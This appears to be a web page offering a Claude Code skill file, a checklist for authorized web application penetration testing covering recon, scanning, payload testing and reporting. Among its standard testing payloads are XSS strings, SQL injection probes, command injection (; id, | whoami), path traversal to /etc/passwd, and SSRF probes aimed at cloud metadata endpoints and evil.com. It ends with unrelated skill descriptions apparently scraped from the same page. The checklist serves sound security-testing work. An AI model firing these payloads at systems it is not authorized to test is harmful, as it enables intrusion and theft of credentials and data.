Penetration Testing Checklist
Systematic web application penetration testing methodology. Apply when performing authorized security assessments, bug bounty hunting, or pre-deployment security validation. Covers recon, scanning, exploitation, and reporting.
git clone --depth 1 https://github.com/ThamJiaHe/claude-code-handbook /tmp/penetration-testing-checklist && cp -r /tmp/penetration-testing-checklist/skills/examples/penetration-testing- ~/.claude/skills/penetration-testing-checklistpenetration-testing-skill.md
# Penetration Testing Checklist
Systematic methodology for authorized web application security testing.
**IMPORTANT:** Only use this skill for authorized security testing — pentesting engagements, bug bounty programs, CTF challenges, or testing your own applications.
## Overview
This skill provides a structured pentest workflow:
1. **Reconnaissance** — Gather information about the target
2. **Scanning** — Identify attack surface and vulnerabilities
3. **Exploitation** — Validate vulnerabilities (with permission)
4. **Post-Exploitation** — Assess impact and lateral movement
5. **Reporting** — Document findings with remediation guidance
## Phase 1: Reconnaissance
### Passive Recon (No direct interaction with target)
```bash
# DNS enumeration
dig +short target.com
dig +short -t MX target.com
dig +short -t TXT target.com
# Subdomain discovery
# Use tools like subfinder, amass, or online services
# Technology fingerprinting (check HTTP headers)
curl -sI https://target.com | grep -iE "(server|x-powered|x-frame|content-security)"
# Check robots.txt and sitemap
curl -s https://target.com/robots.txt
curl -s https://target.com/sitemap.xml
```
### Active Recon (Direct interaction)
```bash
# Port scanning (with authorization)
nmap -sV -sC -oN scan_results.txt target.com
# Web technology detection
# Check response headers, JavaScript libraries, CSS frameworks
# Directory enumeration (with authorization)
# Use wordlists to discover hidden paths and files
```
## Phase 2: Vulnerability Scanning
### Authentication Testing
```markdown
## Auth Checklist
- [ ] Test default credentials (admin/admin, admin/password)
- [ ] Test account enumeration via login error messages
- [ ] Test password reset flow for information disclosure
- [ ] Test session fixation
- [ ] Test session timeout and invalidation on logout
- [ ] Test remember-me functionality
- [ ] Test brute force protections
- [ ] Test MFA bypass techniques
- [ ] Test OAuth/OIDC implementation (state, nonce, redirect_uri)
```
### Input Validation Testing
```markdown
## Injection Checklist
- [ ] SQL injection: ' OR 1=1 --, UNION SELECT, blind timing
- [ ] XSS: <script>alert(1)</script>, event handlers, SVG payloads
- [ ] Command injection: ; id, | whoami, $(command)
- [ ] Template injection: {{7*7}}, ${7*7}, #{7*7}
- [ ] Path traversal: ../../../etc/passwd, ....//....//
- [ ] LDAP injection: )(cn=*), *()|(&)
- [ ] XML injection: XXE payloads if XML parsing exists
- [ ] Header injection: CRLF in headers (%0d%0a)
```
### Access Control Testing
```markdown
## Authorization Checklist
- [ ] IDOR: Change resource IDs to access other users' data
- [ ] Forced browsing: Access admin paths as regular user
- [ ] HTTP method tampering: Try PUT/DELETE on read-only endpoints
- [ ] Parameter manipulation: Modify price, role, quantity parameters
- [ ] JWT testing: Algorithm confusion, expired token reuse, claim tampering
- [ ] API key scope: Test keys against endpoints beyond their scope
- [ ] CORS misconfiguration: Test with different Origin headers
```
### Business Logic Testing
```markdown
## Logic Checklist
- [ ] Price manipulation: Modify prices in client-side requests
- [ ] Quantity manipulation: Negative quantities, zero prices
- [ ] Race conditions: Concurrent requests for one-time operations
- [ ] Workflow bypass: Skip steps in multi-step processes
- [ ] Rate limit bypass: Header rotation, IP rotation
- [ ] Feature abuse: Use features in unintended combinations
```
## Phase 3: Common Vulnerability Tests
### XSS Testing Payloads
```
# Basic reflected XSS
<script>alert(document.domain)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
# Attribute injection
" onfocus="alert(1)" autofocus="
' onfocus='alert(1)' autofocus='
# Filter bypass
<scr<script>ipt>alert(1)</scr</script>ipt>
<img src=x onerror="alert(1)">
# DOM-based XSS check points
- URL fragments (#)
- document.location
- document.referrer
- window.name
- postMessage handlers
```
### SQL Injection Testing
```
# Error-based detection
' --
' OR '1'='1
' UNION SELECT NULL--
# Blind boolean-based
' AND 1=1-- (true - normal response)
' AND 1=2-- (false - different response)
# Time-based blind
' AND SLEEP(5)--
' AND pg_sleep(5)--
# UNION-based enumeration
' UNION SELECT table_name,NULL FROM information_schema.tables--
```
### SSRF Testing
```
# Internal network access
http://127.0.0.1/
http://localhost/
http://[::1]/
http://0.0.0.0/
# Cloud metadata endpoints
http://169.254.169.254/latest/meta-data/ (AWS)
http://metadata.google.internal/ (GCP)
http://169.254.169.254/metadata/ (Azure)
# URL parser confusion
http://127.0.0.1@evil.com
http://evil.com#@127.0.0.1
```
## Phase 4: Reporting
### Finding Template
```markdown
## Finding: [Vulnerability Title]
**Severity:** Critical / High / Medium / Low / Informational
**CVSS Score:** X.X
**CWE:** CWE-XXX
**OWASP:** A0X:2025
### Description
[What the vulnerability is and why it matters]
### Steps to Reproduce
1. Navigate to [URL]
2. Enter [payload] in [field]
3. Observe [result]
### Proof of Concept
[Screenshot, HTTP request/response, or code snippet]
### Impact
[What an attacker could do — data access, account takeover, etc.]
### Remediation
[Specific fix with code example]
### References
- [OWASP reference]
- [CWE reference]
```
### Severity Classification
| Severity | Criteria | Examples |
|----------|----------|---------|
| **Critical** | Full system compromise, mass data breach | RCE, SQL injection with admin access, auth bypass |
| **High** | Significant data access or privilege escalation | Stored XSS, IDOR with PII, SSRF to internal services |
| **Medium** | Limited data access or user impact | Reflected XSS, CSRF, information disclosure |
| **Low** | Minimal direct impact | Verbose errors, missing headers, clickjacking |
| **Info** | Best practice recommendations | Outdated TLS, missing HSTS preload |
## Tools Reference
| Category | Tools |
|----------|-------|Build REST APIs with proper error handling, status codes, request validation, response formatting, and rate limiting. Apply when creating API routes, handling errors, validating input, or designing API responses.
Harden REST and GraphQL APIs against common attack vectors. Apply when building API endpoints, implementing authentication, handling file uploads, or exposing APIs to external consumers.
Deploy Node.js applications on AWS using EC2, RDS, and managed services with security best practices. Apply when setting up AWS infrastructure, configuring databases, managing security, or optimizing costs.
Rapidly fix build failures, type errors, and lint issues with minimal diffs. Apply when builds fail, TypeScript reports errors, or CI/CD pipelines break. Focuses on getting the build green fast.
STRIDE-based threat modeling for application architecture. Apply when designing new systems, reviewing architecture, or assessing security posture of existing applications.
Production-ready Docker patterns for multi-stage builds, security hardening, and orchestration. Apply when creating Dockerfiles, docker-compose configs, or deploying containerized applications.
Enforces Conventional Commits, PR standards, merge conflict resolution, and branch management. Apply when committing code, opening PRs, resolving conflicts, managing branches, or handling Git operations.
Deploy Node.js applications on Google Cloud with Cloud Run, Cloud Firestore, and Google APIs. Implement OAuth2 authentication and manage service accounts. Apply when building serverless applications, integrating Google services, or deploying to GCP.